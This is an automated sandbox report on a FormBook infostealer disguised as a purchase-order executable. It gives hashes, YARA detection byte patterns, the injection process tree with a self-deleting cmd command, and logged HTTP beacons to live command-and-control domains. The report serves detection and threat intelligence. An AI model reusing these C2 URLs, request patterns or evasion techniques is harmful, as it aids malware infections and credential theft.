
Analysis Report Purchase Order 40,7045$.exe

Overview

General Information

Sample Name: Purchase Order 40,7045$.exe
Analysis ID: 321389
MD5: ba4f1b472cb69d8a3924d88dacf1b833
SHA1: 622cdccdc0f020d368a87c5eff9ec1a1259e21c7
SHA256: 2a694c3a8347816b2f85e036b1064e410ad1578185a0608416944199ef72b82c
Tags: exe, Formbook, Yahoo

Most interesting Screenshot:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM_3
Yara detected FormBook
.NET source code contains potential unpacker
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • Purchase Order 40,7045$.exe (PID: 6708 cmdline: 'C:\Users\user\Desktop\Purchase Order 40,7045$.exe' MD5: BA4F1B472CB69D8A3924D88DACF1B833)
    • MSBuild.exe (PID: 6748 cmdline: {path} MD5: D621FD77BD585874F9686D3A76462EF1)
      • explorer.exe (PID: 3472 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • raserver.exe (PID: 7048 cmdline: C:\Windows\SysWOW64\raserver.exe MD5: 2AADF65E395BFBD0D9B71D7279C8B5EC)
          • cmd.exe (PID: 6200 cmdline: /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6268 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source: 00000001.00000002.289490288.00000000011C0000.00000040.00000001.sdmp
Rule: JoeSecurity_FormBook
Description: Yara detected FormBook
Author: Joe Security

Source: 00000001.00000002.289490288.00000000011C0000.00000040.00000001.sdmp
Rule: Formbook_1
Description: autogenerated rule brought to you by yara-signator
Author: Felix Bilstein - yara-signator at cocacoding dot com
Strings:
  • 0x83d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8772:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14085:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x13b71:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14187:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x142ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x917a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x12dec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x9ef2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19167:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a1da:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Source: 00000001.00000002.289490288.00000000011C0000.00000040.00000001.sdmp
Rule: Formbook
Description: detect Formbook in memory
Author: JPCERT/CC Incident Response Group
Strings:
  • 0x16089:$sqlite3step: 68 34 1C 7B E1
  • 0x1619c:$sqlite3step: 68 34 1C 7B E1
  • 0x160b8:$sqlite3text: 68 38 2A 90 C5
  • 0x161dd:$sqlite3text: 68 38 2A 90 C5
  • 0x160cb:$sqlite3blob: 68 53 D8 7F 8C
  • 0x161f3:$sqlite3blob: 68 53 D8 7F 8C

Source: 00000006.00000002.521320039.0000000000660000.00000040.00000001.sdmp
Rule: JoeSecurity_FormBook
Description: Yara detected FormBook
Author: Joe Security

Source: 00000006.00000002.521320039.0000000000660000.00000040.00000001.sdmp
Rule: Formbook_1
Description: autogenerated rule brought to you by yara-signator
Author: Felix Bilstein - yara-signator at cocacoding dot com
Strings:
  • 0x83d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8772:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14085:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x13b71:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14187:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x142ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x917a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x12dec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x9ef2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19167:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a1da:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

18 further memory dump entries are not shown here.

Unpacked PEs

Source: 1.2.MSBuild.exe.400000.0.unpack
Rule: JoeSecurity_FormBook
Description: Yara detected FormBook
Author: Joe Security

Source: 1.2.MSBuild.exe.400000.0.unpack
Rule: Formbook_1
Description: autogenerated rule brought to you by yara-signator
Author: Felix Bilstein - yara-signator at cocacoding dot com
Strings:
  • 0x75d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x7972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x13285:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x12d71:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x13387:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x134ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x837a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x11fec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x90f2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x18367:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x193da:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Source: 1.2.MSBuild.exe.400000.0.unpack
Rule: Formbook
Description: detect Formbook in memory
Author: JPCERT/CC Incident Response Group
Strings:
  • 0x15289:$sqlite3step: 68 34 1C 7B E1
  • 0x1539c:$sqlite3step: 68 34 1C 7B E1
  • 0x152b8:$sqlite3text: 68 38 2A 90 C5
  • 0x153dd:$sqlite3text: 68 38 2A 90 C5
  • 0x152cb:$sqlite3blob: 68 53 D8 7F 8C
  • 0x153f3:$sqlite3blob: 68 53 D8 7F 8C

Source: 1.2.MSBuild.exe.400000.0.raw.unpack
Rule: JoeSecurity_FormBook
Description: Yara detected FormBook
Author: Joe Security

Source: 1.2.MSBuild.exe.400000.0.raw.unpack
Rule: Formbook_1
Description: autogenerated rule brought to you by yara-signator
Author: Felix Bilstein - yara-signator at cocacoding dot com
Strings:
  • 0x83d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8772:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14085:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x13b71:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14187:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x142ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x917a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x12dec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x9ef2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19167:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a1da:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

1 further unpacked PE entry is not shown here.

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Antivirus detection for URL or domain
Source: http://www.allmm.info/igqu/?1b3H_Ni=4PnhXD1XQOAEhvyRg6knEMy8erSWBtwfFfVfV7Yg7HuI1lqkNO9tokZPvE8hw33lw/Tr&JXhpvv=OXXTgtL8CzU0PRx0, Avira URL Cloud: Label: malware
Source: http://www.forbigdogs.com/igqu/?1b3H_Ni=hqyhMfRLrOIQC7GjaQnjrCruer7JrdNhQeLxI9U0LsQdDm7qZoXdq0VVbkb5+tb+Xu86&JXhpvv=OXXTgtL8CzU0PRx0, Avira URL Cloud: Label: malware
Multi AV Scanner detection for submitted file
Source: Purchase Order 40,7045$.exe, ReversingLabs: Detection: 18%
Yara detected FormBook
Source: Yara match, File source: 00000001.00000002.289490288.00000000011C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000006.00000002.521320039.0000000000660000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000002.260425222.0000000003D51000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000006.00000002.521773301.0000000000950000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000001.00000002.289472822.0000000001190000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000001.00000002.289268123.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000006.00000002.521861519.0000000000980000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 1.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 1.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
Machine Learning detection for sample
Source: Purchase Order 40,7045$.exe, Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 1.2.MSBuild.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Code function: 4x nop then pop edi
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Code function: 4x nop then pop edi
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Code function: 4x nop then pop ebx
Source: C:\Windows\SysWOW64\raserver.exe, Code function: 4x nop then pop edi
Source: C:\Windows\SysWOW64\raserver.exe, Code function: 4x nop then pop edi
Source: C:\Windows\SysWOW64\raserver.exe, Code function: 4x nop then pop ebx

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic, Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.5:49747
Source: Traffic, Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.5:49756
Source: Traffic, Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.5:49758
Source: Traffic, Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.5:49759
Source: global traffic, HTTP traffic detected: GET /igqu/?1b3H_Ni=b5xSTUUVmbOqauvhDdE25zWaspHItZbymNmRh6QlTutVQGy0NN3SxEYa8xt/OgRWZ9lL&JXhpvv=OXXTgtL8CzU0PRx0 HTTP/1.1; Host: www.ariasu-nakanokaikei.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: global traffic, HTTP traffic detected: GET /igqu/?1b3H_Ni=Jn5Vr1+14bH3XXZofqraFeWVa26wP8rJvzlWs5bnBoBEHljdRY0tb4g4rLkzBbL1dWSS&JXhpvv=OXXTgtL8CzU0PRx0 HTTP/1.1; Host: www.allan-wren.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: global traffic, HTTP traffic detected: GET /igqu/?1b3H_Ni=7TsZUea1gk4hSEvdc6EZbm1J0Wfs+lYlHRlJN5vF1TH1x8D6KkvV8DgWQzT8NLbVi8yc&JXhpvv=OXXTgtL8CzU0PRx0 HTTP/1.1; Host: www.theoutdoorbed.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: global traffic, HTTP traffic detected: GET /igqu/?1b3H_Ni=YEhaVrRn7U1iAIlzVSLmJg7Vd2zqgykvRGHwZQMAJohu7B6Tc4aodga4QJg4WZr1G+1s&JXhpvv=OXXTgtL8CzU0PRx0 HTTP/1.1; Host: www.sweetbasilmarketing.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: global traffic, HTTP traffic detected: GET /igqu/?1b3H_Ni=cgoB+lenqGYlJtvc5JNC9VTF2CGbWvKagdSG/Om1O4x9+LG6GIhzUmnXZfPmgHDFLZxT&JXhpvv=OXXTgtL8CzU0PRx0 HTTP/1.1; Host: www.pasumaisangam.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: global traffic, HTTP traffic detected: GET /igqu/?1b3H_Ni=4h23ofVf0wd/XYFA6lbDKykObBKMIHvT+gmvC/ZN8Gk4kRGXSO1DXfeAEBypKVKLfK2k&JXhpvv=OXXTgtL8CzU0PRx0 HTTP/1.1; Host: www.justsoldbykristen.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: global traffic, HTTP traffic detected: GET /igqu/?1b3H_Ni=xBkCUm8FF1kjoaFXSBT5hrl7iUeljBCg0asG3x/fx29GNVo3vuMsob2h52kMpeSzyrJ8&JXhpvv=OXXTgtL8CzU0PRx0 HTTP/1.1; Host: www.lotoencasa.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: global traffic, HTTP traffic detected: GET /igqu/?1b3H_Ni=KYQlcl9vZGj8bR01lvQ9gDl5O0hjo7xV5yl6UTMOowrmblKr/7vG5jbVDjpERd28t5Sb&JXhpvv=OXXTgtL8CzU0PRx0 HTTP/1.1; Host: www.guidesgold.net; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: global traffic, HTTP traffic detected: GET /igqu/?1b3H_Ni=UOytMzsBKWezP+Z4jPobAURSNGb1svEAtMI07cL6UgNiZ1/Q1uLpHFW2AnXGybnNRzQX&JXhpvv=OXXTgtL8CzU0PRx0 HTTP/1.1; Host: www.thoughtslate.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: global traffic, HTTP traffic detected: GET /igqu/?1b3H_Ni=K/S7l+gZOJHSbd5nxE/i7D8w4PbP25DXYiwy4kAXmG/uB5hJOsw6W9LAHGkKev0TSo0+&JXhpvv=OXXTgtL8CzU0PRx0 HTTP/1.1; Host: www.chemtradent.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: global traffic, HTTP traffic detected: GET /igqu/?1b3H_Ni=ZRPeOuYuFqwCE6hLODJInGZZul3mSlUAF2kmaH+TgtUwwh/GNGVQ9RWrqwSZOKD9NgnN&JXhpvv=OXXTgtL8CzU0PRx0 HTTP/1.1; Host: www.erpsystem.site; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: global traffic, HTTP traffic detected: GET /igqu/?1b3H_Ni=hqyhMfRLrOIQC7GjaQnjrCruer7JrdNhQeLxI9U0LsQdDm7qZoXdq0VVbkb5+tb+Xu86&JXhpvv=OXXTgtL8CzU0PRx0 HTTP/1.1; Host: www.forbigdogs.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: global traffic, HTTP traffic detected: GET /igqu/?1b3H_Ni=42cTP78OQQp4lToQAaTApkvzdS7tu3b97V7Z9hUZNPZ7GHRvcEVBBFWfORKXu9ozCmYh&JXhpvv=OXXTgtL8CzU0PRx0 HTTP/1.1; Host: www.rockinglifefromhome.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: global traffic, HTTP traffic detected: GET /igqu/?1b3H_Ni=4PnhXD1XQOAEhvyRg6knEMy8erSWBtwfFfVfV7Yg7HuI1lqkNO9tokZPvE8hw33lw/Tr&JXhpvv=OXXTgtL8CzU0PRx0 HTTP/1.1; Host: www.allmm.info; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: global traffic, HTTP traffic detected: GET /igqu/?1b3H_Ni=b5xSTUUVmbOqauvhDdE25zWaspHItZbymNmRh6QlTutVQGy0NN3SxEYa8xt/OgRWZ9lL&JXhpvv=OXXTgtL8CzU0PRx0 HTTP/1.1; Host: www.ariasu-nakanokaikei.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: Joe Sandbox View, IP Address: 81.169.145.95
Source: Joe Sandbox View, IP Address: 185.201.11.126
Source: Joe Sandbox View, ASN Name: AMAZON-AESUS
Source: Joe Sandbox View, ASN Name: IOFLOODUS
Source: unknown, TCP traffic detected without corresponding DNS query: 104.42.151.234
Source: unknown, TCP traffic detected without corresponding DNS query: 20.190.129.133
Source: unknown, TCP traffic detected without corresponding DNS query: 20.190.129.133
Source: unknown, TCP traffic detected without corresponding DNS query: 20.190.129.133
Source: unknown, TCP traffic detected without corresponding DNS query: 20.190.129.133
Source: unknown, TCP traffic detected without corresponding DNS query: 20.190.129.133
Source: unknown, TCP traffic detected without corresponding DNS query: 20.190.129.133
Source: unknown, TCP traffic detected without corresponding DNS query: 20.190.129.133
Source: unknown, TCP traffic detected without corresponding DNS query: 20.190.129.133
Source: unknown, TCP traffic detected without corresponding DNS query: 20.190.129.133
Source: unknown, TCP traffic detected without corresponding DNS query: 20.190.129.133
Source: unknown, TCP traffic detected without corresponding DNS query: 20.190.129.133
Source: unknown, TCP traffic detected without corresponding DNS query: 20.190.129.133
Source: unknown, TCP traffic detected without corresponding DNS query: 20.190.129.133
Source: unknown, TCP traffic detected without corresponding DNS query: 20.190.129.133
Source: unknown, TCP traffic detected without corresponding DNS query: 20.190.129.133
Source: unknown, TCP traffic detected without corresponding DNS query: 20.190.129.133
Source: unknown, TCP traffic detected without corresponding DNS query: 20.190.129.133
Source: unknown, TCP traffic detected without corresponding DNS query: 20.190.129.133
Source: unknown, TCP traffic detected without corresponding DNS query: 20.190.129.133
Source: unknown, TCP traffic detected without corresponding DNS query: 104.79.89.181
Source: unknown, TCP traffic detected without corresponding DNS query: 93.184.220.29
Source: unknown, TCP traffic detected without corresponding DNS query: 84.53.167.113
Source: unknown, TCP traffic detected without corresponding DNS query: 84.53.167.113
Source: unknown, TCP traffic detected without corresponding DNS query: 93.184.220.29
Source: unknown, TCP traffic detected without corresponding DNS query: 93.184.220.29
Source: unknown, TCP traffic detected without corresponding DNS query: 93.184.220.29
Source: unknown, TCP traffic detected without corresponding DNS query: 40.67.254.36
Source: unknown, TCP traffic detected without corresponding DNS query: 93.184.220.29
Source: unknown, TCP traffic detected without corresponding DNS query: 40.67.254.36
Source: unknown, TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown, TCP traffic detected without corresponding DNS query: 93.184.220.29
Source: unknown, TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown, TCP traffic detected without corresponding DNS query: 93.184.220.29
Source: unknown, TCP traffic detected without corresponding DNS query: 104.79.89.181
Source: unknown, TCP traffic detected without corresponding DNS query: 93.184.220.29
Source: unknown, TCP traffic detected without corresponding DNS query: 93.184.220.29
Source: unknown, TCP traffic detected without corresponding DNS query: 93.184.220.29
Source: unknown, TCP traffic detected without corresponding DNS query: 93.184.220.29
Source: unknown, TCP traffic detected without corresponding DNS query: 20.190.129.133
Source: unknown, TCP traffic detected without corresponding DNS query: 93.184.220.29
Source: unknown, TCP traffic detected without corresponding DNS query: 20.190.129.133
Source: unknown, TCP traffic detected without corresponding DNS query: 93.184.220.29
Source: unknown, TCP traffic detected without corresponding DNS query: 93.184.220.29
Source: unknown, TCP traffic detected without corresponding DNS query: 93.184.220.29
Source: unknown, TCP traffic detected without corresponding DNS query: 93.184.220.29
Source: unknown, TCP traffic detected without corresponding DNS query: 20.190.129.133
Source: unknown, TCP traffic detected without corresponding DNS query: 20.190.129.133
Source: unknown, TCP traffic detected without corresponding DNS query: 20.190.129.133
Source: unknown, TCP traffic detected without corresponding DNS query: 20.190.129.133
Source: unknown, DNS traffic detected: queries for: g.msn.com
Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found; Date: Sat, 21 Nov 2020 08:24:27 GMT; Server: Apache/2.4.43 (Unix); Content-Length: 196; Connection: close; Content-Type: text/html; charset=iso-8859-1; Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a; Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmp, String found in binary or memory: http://fontfabrik.com
Source: Purchase Order 40,7045$.exe, 00000000.00000002.259984630.0000000002D51000.00000004.00000001.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmp, String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmp, String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmp, String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmp, String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmp, String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmp, String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmp, String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmp, String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmp, String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmp, String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmp, String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmp, String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmp, String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmp, String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmp, String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmp, String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmp, String found in binary or memory: http://www.zhongyicts.com.cn
Source: unknown, Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown, Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 49695 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49695
Source: unknown, Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49702
Source: Purchase Order 40,7045$.exe, 00000000.00000002.259665211.0000000000F88000.00000004.00000020.sdmp, Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected FormBook
Source: Yara match, File source: 00000001.00000002.289490288.00000000011C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000006.00000002.521320039.0000000000660000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000002.260425222.0000000003D51000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000006.00000002.521773301.0000000000950000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000001.00000002.289472822.0000000001190000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000001.00000002.289268123.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000006.00000002.521861519.0000000000980000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 1.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 1.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          Malicious sample detected (through community Yara rule)
          Source: 00000001.00000002.289490288.00000000011C0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.289490288.00000000011C0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.521320039.0000000000660000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.521320039.0000000000660000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.260425222.0000000003D51000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.260425222.0000000003D51000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.521773301.0000000000950000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
